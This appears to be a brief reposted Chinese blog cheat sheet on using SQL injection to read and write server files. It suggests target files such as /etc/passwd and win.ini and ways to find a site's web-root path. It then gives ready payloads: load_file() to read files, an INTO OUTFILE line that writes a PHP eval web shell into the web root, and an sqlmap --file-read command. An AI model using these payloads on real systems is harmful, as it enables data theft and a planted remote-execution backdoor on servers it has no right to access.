sql注入文件寫入和讀取

本文轉載自查看原文 2019-09-28 20:54 804 sql注入

系統固定文件路徑：https://blog.csdn.net/ncafei/article/details/54616826

/etc/passwd

c:/windows/win.ini

文件讀取使用load_file()函數：

使用之前我們需要先找到網站的絕對路徑。（獲取辦法：報錯顯示、谷歌語法、site:目標網站 warning、遺留文件如phpinfo、漏洞爆出路徑、讀取配置文件）

注意路徑符號：錯誤“\” 正確"\\" 正確"/"。如果將路徑轉換為16進制就可以不用引號。

union select 1,load_file(“c:/inetpub/wwwroot/index.php”),3

union select 1,"<?php @eval($_GET[x]);?>",3,4,5 into outfile 'C:/Inetpub/wwwroot/cc.php'

--file-read用法用於讀取本地文件

python sqlmap.py -u "http://xxx/x?id=1" --file-read=/etc/passwd

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 SQL注入文件寫入和讀取詳解 SQL注入——Mysql文件讀取寫入，結合文件包含漏洞 sql注入之文件寫入into outfile 把讀取sql的結果寫入到excel文件 SQL注入文件讀取通過from for分頁讀取小白日記40：kali滲透測試之Web滲透-SQL手工注入（二）-讀取文件、寫入文件、反彈shell sql注入讀取文件之各種繞過姿勢 Python 文件的讀取與寫入《pickle 文件讀取寫入》 python讀取或寫入文件